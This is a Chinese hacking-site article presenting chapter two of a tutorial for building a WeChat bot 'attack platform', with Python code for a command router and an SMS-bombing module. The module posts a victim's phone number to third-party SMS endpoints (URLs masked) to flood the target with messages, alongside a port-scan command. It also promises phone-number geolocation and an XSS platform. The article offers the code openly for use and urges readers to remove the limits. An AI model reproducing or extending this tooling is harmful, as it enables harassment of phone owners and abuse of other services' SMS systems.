您现在的位置: 华盟网 >> Hack >> QQ 黑客 >> 正文

[图文]黑客微信攻击平台-第二章(短信攻击)

2016/2/19 作者:三斤 来源: inn0team
导读 继上一次第一章之后,我们继续来说说短信在微信平台的用处

  告知:

  本公众号不提供非法用途,所以有些攻击手段,公众号内将会有诸多限制。如果想打造真正没有限制的攻击平台,请自申请公众号,源代码将会在下几章发布到github。

  公众号短信攻击只在发布文章的30分钟内,开放超过该时间取消此功能。

  公众号短信攻击只在发布文章的30分钟内,开放超过该时间取消此功能。

  公众号短信攻击只在发布文章的30分钟内,开放超过该时间取消此功能。

  目标:

  短信攻击

  网站扫描

  端口扫描

  IP定位

  MD5破解

  xss平台

  …… (有什么需要添加的,请留言)

  (透露下,如果没有意外可能会加入手机号定位功能)

  关于代码:

  本套代码,将会在github 开源(采用 MIT 许可协议,可放心集成于商业产品中)。

  开始打造

以下是代码片段:

目录:

* 代表此次修改文件
|-- run.py #启动文件
|-- wechat #微信配置目录
|---- __init__.py
|---- wechatConfig.py #微信配置验证,模块加载接口 *
|---- mode #模块目录
|------ __init__.py
|------ scanPort.py #端口扫描模块
|------ sendSMS.py #短信攻击模块 *

wechatConfig.py

#! /usr/bin/python
# -*- coding: utf-8 -*-
from flask import make_response
import hashlib
from mode import scanPort,sendSMS

def wechat_auth(token,data):
   signature = data.get('signature','')
   timestamp = data.get('timestamp','')
   nonce = data.get('nonce','')
   echostr = data.get('echostr','')
   s = [timestamp,nonce,token]
   s.sort()
   s = ''.join(s)
   if (hashlib.sha1(s).hexdigest() == signature):
       return make_response(echostr)

def wechat_mode(content):
   if content==u"攻击":
       return "G1:端口扫描\nG2:短信攻击\n\n攻击格式:编号&目标\n列如:G1&127.0.0.1\n列如:G2&188****1111"
   elif  "G1&" in content:
       arr=content.split('&')
       return "你扫描的IP端口为:"+str(scanPort.init(arr[1]))
   elif  "G2&"in content:
       arr=content.split('&')
       return "系统提示:"+str(sendSMS.sendSMS(arr[1]))
   else:
       return "感谢你的留言!"

sendSMS.py:

#! /usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import urllib


#短信攻击接口1
def sendServer1(phone):
   data = {}
   data['mobile'] = phone
   #定义post的地址
   url = 'http://www.xxxxx.com/xxxx/xxxxxx'
   post_data = urllib.urlencode(data)
   #提交,发送数据
   try:
       req = urllib2.urlopen(url, post_data)
   except:
       print '异常'

#短信攻击接口2
def sendServer2(phone):
   data = {}
   data['mobile'] = phone
   #定义post的地址
   url = 'http://www.xxxxx.com/xxxx/xxxxxx'
   post_data = urllib.urlencode(data)
   #提交,发送数据
   try:
       req = urllib2.urlopen(url, post_data)
   except:
       print '异常'


def sendSMS(phone):
   sendServer1(phone)
   sendServer2(phone)
   return '发送成功!'

启动项目:

python run.py 

  测试截图



                  微信群名称:华盟黑白之道二群     华盟-黑白之道⑦QQ群: 9430885

  • 上一篇Hack:

  • 下一篇Hack: 没有了
  • 网友评论
      验证码
     

    关注

    分享

    0

    讨论

    2

    猜你喜欢

    论坛最新贴